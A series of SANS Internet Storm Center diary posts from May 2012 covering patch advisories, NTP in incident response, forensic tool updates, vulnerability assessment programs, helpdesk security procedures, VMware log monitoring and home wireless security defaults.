As with other security patches, you should definitely install it as part of your monthly patch install cycles. The whole exercise also shows how one should always test security controls that you put in place – just the fact that you added a rule to block certain network traffic does not have to mean that the traffic is really blocked.

More information and the patch is available at the Microsoft’s web site: http://technet.microsoft.com/en-us/security/bulletin/ms12-032

Advisory details at http://www.infigo.hr/en/in_focus/advisories/INFIGO-2012-05-01



Published: 2012-05-08

New Poll: Which Patch Delivery Schedule Works the Best for You?

I've enabled a new poll today in honor of this month's Patch-Tuesday.  In your organization is it easier for you to set aside that 2nd week of the month to focus on security patching, or is it easier for you to integrate security patching into your everyday system administration?  I've always felt that if your environment was large enough to have it's on vulnerability management team, a steady stream of security advisories was preferable to the shock of all arriving at the same day.  However, not everyone is that size, so it may be easier to schedule widespread reboots on Tuesday nights, saving Wednesday for dealing with any consequences (which seem to be happening less often, thankfully.) 

Which would you prefer in your environment?


Published: 2012-05-08

Incident-response without NTP


While we patiently await the arrival of this month's patches from Microsoft (and everyone else who publishes today) I have a little thought experiment for you. We all know that the internet doesn't work too efficiently if DNS isn't working or present. NTP is just as critical for your security infrastructure. Without reliable clock synchronization, piecing together what happened during an incident can become extremely difficult.

Consider a hypothetical services network and DMZ: there's an external firewall, a couple of webservers, an inner firewall with a database server behind it. Let's also assume that something bad happened to the webservers a couple of months ago and you've been brought in as a consultant to piece together the order of events and figure out what the attacker did. The web administration team, and the database team, and the firewall team have all provided your request for logs and you've got them on your system of choice.

More About NTP

For a complete background on NTP I recommend: http://www.ntp.org/ntpfaq

There are two main types of clock error that we are concerned with in this example:

  • Clock Skew  also called Accuracy, determines how close a clock is to an official time reference.
  • Clock Drift or the change in accuracy over time.

Common clock hardware is not very accurate; an error of 0.001% causes a clock to be off by nearly one second per day.  We can expect most clocks to have one second of drift every 2 days.  The oscillator used in computer clocks can be influenced by changes in local temperature, and the quality of the electricity feeding the system.

Today's Challenge

How do you begin order the events between the systems?  First I'll solicit general approaches via comments and email, later I'll summarize and provide some example data to illustrate the most popular/promising approaches.


Published: 2012-05-07

iOS 5.1.1 Software Update for iPod, iPhone, iPad

Apple released iOS 5.1.1 for iPod, iPhone, iPad (exclude Mac OS X) only available through iTunes. The updates address Safari and WebKit for iPhone 3GS, iPhone 4, iPhone 4S, iPod touch (3rd generation) and later, iPad, iPad 2. At the time of this writing, the advisory was still not posted (APPLE-SA-2012-05-07-1) but the update is available through iTunes.

[1] http://support.apple.com/kb/HT1222


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-05-06

Tool updates and Win 8

Rumor has it that somewhere outside the bat cave, it is a beautiful summer-ish day, but fear not, we shall shun the sunlight and watch for internet evil.  Well, okay, I'm inside for the moment watching the handlers list, but that probably won't last for long.  Since it has been a slow day, I figured this would be good time pass on some info on updates to some of my favorite tools.  In particular, Harlan Carvey has updated RegRipper to v2.5 and laid out his roadmap toward v3.0 which he expects to release later this year.  It doesn't look like this will affect me much personally since I mostly run RegRipper from the command-line on Linux, but it did cause me to update the Parse::Win32Registry perl module on may analysis system to v1.0 (something you may want to do too, see Harlan's post about running into 'big data' issues).

Also, Didier Stevens has updated his TaskManager.xls spreadsheet, that allows injecting of shellcode to kill stubborn processes.

And, finally, Windows 8 is available to testers, so I was interested in Amanda C. F. Thomson's Windows 8 Forensics Guide, available for download over at the Propeller Head Forensics blog.






Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu


Published: 2012-05-05

Vulnerability Exploit for Snow Leopard

Today there was a brief discussion among a few Handlers regarding the vulnerability reported by Microsoft in March.  The discussion was not so much on the fact that there was an exploit for a Mac OS, or that it was published by Microsoft.  The discussion was focused on the sense of complacency that has seemed to develop around Mac products where security is concerned.

Looking back to 2001, Larry Ellison proudly proclaimed Oracle was ‘unbreakable’  (That statement proved to be untrue, and the hacking community gladly pointed that out to Oracle very quickly.)  At the time he most likely based his statement on the fact that there were no known vulnerabilities in the database application at the time.  And, at that moment in time, it may have been true.  But time marches on....

While the Mac operating systems may not have the number of vulnerabilities that exist in other operating systems, they do exist, and it is only a matter of time before those vulnerabilities play out in the public.  We as security professionals would be wise to look at the history of end-user platforms and plan accordingly.  It is only a matter of time, as the exposure of these systems increases, the number of reported vulnerabilities will increase.


tony d0t carothers - gmail


Published: 2012-05-05

Vulnerability Assessment Program - Discussions

On a slow Saturday in May I thought I would open the forum for discussion here at the ISC on a topic.  I am working on a project to update the Continuous Vulnerability Assessment (CVA) capability for a client, and I have found a lot of good information on the web.  What I haven’t found a lot of is good experiences on the web.  Guy Bruneau wrote a great article in October on CVA and Remediation for the Critical Controls discussed in October.

First off what is a vulnerability assessment?  Wikipedia defines a vulnerability assessment as “the process of identifying, quantifying, and prioritizing (or ranking) the vulnerabilities in a system”.  Vulnerability assessments are often confused with penetration testing, however these two functions serve different roles in a the organization and the overall security assessment.  A CVA program, as a component of the overall enterprise systems management program, needs to consider the process for asset identification, vulnerability reporting and remediation.  

Information I have collected runs the gamut  of technical and marketing information.  A great report on assessment tools is available here.  Search the web for “Vulnerability Assessment”, “Continuous  Vulnerability Assessment”, or “CVA” and the results range greatly.  Technical, marketing, best practices, etc., but what is not abundant is experiences.  What I’m asking of you today is input on experiences and challenges that you've encountered in your implementation or update of a CVA program. I’d love to hear about both the technical and environmental challenges encountered along the way.  Ask yourself “If I had to do it differently, what would I change?”; that’s what I would like to hear.

tony d0t carothers - gmail


Published: 2012-05-04

Adobe Security Flash Update

Adobe released a critical patch for Flash Player addressing an object confusion vulnerability (CVE-2012-0779). If exploited, it could cause the application crash and potentially allow an attacker to take control of the system. The security bulletin is posted here and the update can be downloaded here.

Affected Software

- Windows, Macintosh and Linux version and earlier
- Android 4.x version and earlier
- Android 3.x and 2.x version and earlier

[1] http://www.adobe.com/support/security/bulletins/apsb12-09.html
[2] http://get.adobe.com/flashplayer/


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-05-04

ISC Feature of the Week: Data/Reports


We have launched some new data collection projects relatively recently in addition to the original DShield project. What happens to all that data being collected? When there appears to be enough data to publicly release, the reports will likely be linked to from our Reports page at https://isc.sans.edu/reports.html. You can get there by clicking Data/Reports or its sub-menu Summary Page on the top-right menu. We've highlighted some of these projects in past Features but let's list them all out here.


Data Collection - https://isc.sans.edu/reports.html#collect
This section was added recently as a central location to list new and existing data collection and reporting projects.

Top 10 Ports - https://isc.sans.edu/reports.html#top10ports
Summary table of the top 10 ports listed by Reports, Targets, Sources with link to Port Report Page at https://isc.sans.edu/portreport.html

World Map - https://isc.sans.edu/reports.html#worldmap
Graphics map of country statistics (This deserves more in-depth coverage in another feature diary...Stay Tuned!) with link to Country Report Page at https://isc.sans.edu/countryreport.html

Top Source IPs - https://isc.sans.edu/reports.html#top10source
Top 10 Source IPs as collected by DShield sensor listed with count, number of attacks, first seen and last seen with link to Top Sources Page at https://isc.sans.edu/sources.html

Additional Reports - https://isc.sans.edu/reports.html#additional


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center - https://isc.sans.edu



Published: 2012-05-03

Helping the helpdesk help you

What happens when your helpdesk gets a call from a frantic staff member who’s positive his computer is being hacked by Government X this very second?

The IT helpdesk is the face, voice or automated greeting that most staff and/or customers get to deal with when calling for help*. Most IT helpdesk staff have run sheets or scripts to walk the caller through common problems or perform basic tests. With scripts and the frequency of typical requests, helpdesk staff can become very slick and effective making everyone lives easier.  But what happens when a call comes through and it might be a security issue?

Here are some questions to pose to your organisation:

  1. Has there ever been any discussion between the helpdesk and security teams on what should be done if the call is security related?
  2. Is this scalable in time and work load to get every security related possible call routed to the security team answer?
  3. Should the IT helpdesk staff be provided scripts for basic security procedures other than “Tell them to touch nothing and you call me!”?

Each work place and environment has its own unique factors on how security related call are handled but let’s imagine the security team doesn’t want to field every call that may or may not be anything to do with a security issue. This is where a helpdesk team could, with guidance and coaching, be invaluable in saving time and effort to all parties.

A crucial first step is to define what the helpdesk should do and what they should definitely not do. This sets clear lines of demarcation, stopping any misunderstanding that can occur in the heat of the moment with someone attempting to do what they believe is the right thing and it ends up causing an awful mess.

On the “do” lists are:

- Get a clear description of the problem

- Provide standard details on the caller (username, computer details, IP address, location and so on)

- Record only the facts.

On the “should not do” lists are:

- Connect to the system to try and fix it themselves

- Offer advice on how to fix the problem

- Jump to unsupported conclusions

- Any other actions that may cause harm or impact.


From this point onwards both the security and helpdesk teams have some ground rules and can work together without causing problems.

Feel free to add any comments, thoughts or suggestions on your experiences, good or bad, on solving this problem.


Chris Mohan--- Internet Storm Center Handler on Duty


* Help – this covers actual questions on topics the IT helpdesk staff are trained in rather than those random questions such as why isn’t the fridge working. In case you were wondering, the correct answer was the fridge’s fuse had blown. Obvious really...


Published: 2012-05-02

Monitoring VMWare logs

Virtualization is so popular today that there is almost no company that does not use a virtualization platform. VMWare is definitely the most popular one (at least the most popular one I seem to be running into).

It is also not uncommon to see VMWare farms growing exponentially as people tend to throw more hardware and just create new VMs. In such cases, controlling what your administrators do is a must yet I also see that organizations auditing their VMWare farms (and especially administrator’s activities) are pretty rare.

One of the problems is that reviewing VMWare logs can be complex so it is not easy to setup the whole log collection and analysis system correctly; this is something a lot of SIEM’s and similar log collection and analysis tools fail at. So let’s see what we have to work with here and how we can improve things.

System components

For the sake of this diary, I’ll write mainly about the “typical” setups today that consist of ESXi (or ESX, for older setups) host servers and one or more vCenter management servers.

ESXi is VMWare’s host operating system that actually runs the virtual machines. It is highly optimized and has a footprint of only 150 MB. This is what is usually installed on those big servers that today run 20+ virtual machines.

Of course, when you have more than one ESXi server, you want to manage it centrally, not only to make management easier but to also allow some more sophisticated processes such as vMotion and similar. This management is done through a vCenter server.

vCenter basically just runs on a normal Windows operating system machine that itself can be a VM as well. Administrators normally use the VMWare vSphere client application to connect to vCenter and to manage virtual machines (of course, depending on their role and permission).

The same client (vSphere client) can be used by an administrator to connect directly to an ESXi server and to manage VMs that are hosted on that server. As you can probably guess, this creates problems for activity auditing since, in this case, any changes are performed directly on the ESXi host server so vCenter will not see those activities directly.

Finally, if you are trying to troubleshoot some problems, you can allow SSH access directly to the ESXi hosts – this access is disabled by default, but I found it quite often that organizations enable it and leave it enabled.

Log collection

We can see that there are multiple system components that generate logs that we should be collecting. While vCenter keeps its own logs and allows reviews from the console, ESXi hosts will also independently keep their logs that should be audited. Actually, when an administrator modifies something in vCenter, a task will be created that will cause vCenter to connect to the target ESXi host and issue the change.

At the moment I’m usually recommending clients to collect logs from the following components:

What I’ve found is that the VMWare SDK API allows much easier retrieval of logs that will be nice and structured but, if your SIEM does not support it directly, you will have to code a script to retrieve such logs yourself.

Of course, do not forget about the OS logs as well as the database logs – since this server is the most important one, make sure that you’ve protected it accordingly and that you collect all other log files that might be important.

  • ESXi host logs are also very important since an administrator can connect directly to them (unless this has been prevented). With ESXi there aren’t many options and probably the best one is to configure a local Syslog to send logs to the central Syslog server, as shown in the picture below.

VMWare Syslog settings

Keep in mind, though, that VMWare creates many multi-line logs which will eventually be broken due to size limits of Syslog so correlating them on the server side might be quite a bit difficult, if not impossible.

By using Syslog we will also take care of SSH logins, since these will be logged by the console and sent through Syslog to the central server.


Now that we have all the logs at one place, we can correlate them and setup alerts on suspicious activities.
Regular log reviews are very important. One of the things you should particularly take a look at is console access. For example, if the administrator that accessed a server’s console through vCenter forgot to logout, any other vCenter administrator can access that server’s console (if he has vCenter permissions to access it, of course).

Good log collection and correlation (remember to collect both vCenter logs as well as logs from all your guest servers) can tell you which server’s consoles were accessed as well as if the administrator had to log in or not.

So check your VMWare environments today and see if you can answer these questions: who, from where and when logged in to my vCenter console, which VMs were migrated and which consoles have been accessed by which administrator in last 30 days?

Let us know what your experiences with collecting and analyzing VMWare logs are and if you did something you’d like to share with our readers so everyone can benefit from your work.




Published: 2012-05-01

Are Open SSIDs in decline?

After hearing about my wife's iPad disconnecting from wireless for a couple of weeks (ok, maybe a bit longer than that), I decided to do some upgrades to the home network and replace the problem Access Point (and older home unit).

So off to the store I went, and came home with a bright shiny new A/B/G/N AP.  After throwing the DVD away (you know, the one that comes in every box with the outdated firmware on it), and updating the unit to the current rev, my kid and I started setting it up.

It's been a while since I worked on a standalone AP - my builds normally involve controllers and *lots* of AP's.  So imagine my surprise and joy when I found that these home units no longer default to an SSID with a default name and no security!  This one started the setup by defaulting to WPA-2 / Personal, and asked me what I wanted to use for a key !  You really have to be determined now to create an Open SSID ( good news ! )

So are we looking the long, slow goodnight of open wireless on home networks?  I've written in the past about how tablet users that don't know better routinely "steal" wireless from whoever is close without thinking twice - is this going to get harder and harder from them over the next few years, as people migrate to newer APs?

On the other hand, we're seeing more and more guest networks that are open, things like coffee shops, municipal offices, hair salons - pretty much anyplace you're likely to spend more than 5 minutes at seems compelled to offer up free wireless.  But using free wireless that's offered to you is a much different proposition than stealing it from someone who's misconfigured their home network..

I invite your comments - my AP's name starts with and L and ends with an S (made by our friends at C***o).  Are the current models from other vendors implementing better defaults now too? 

Rob VandenBrink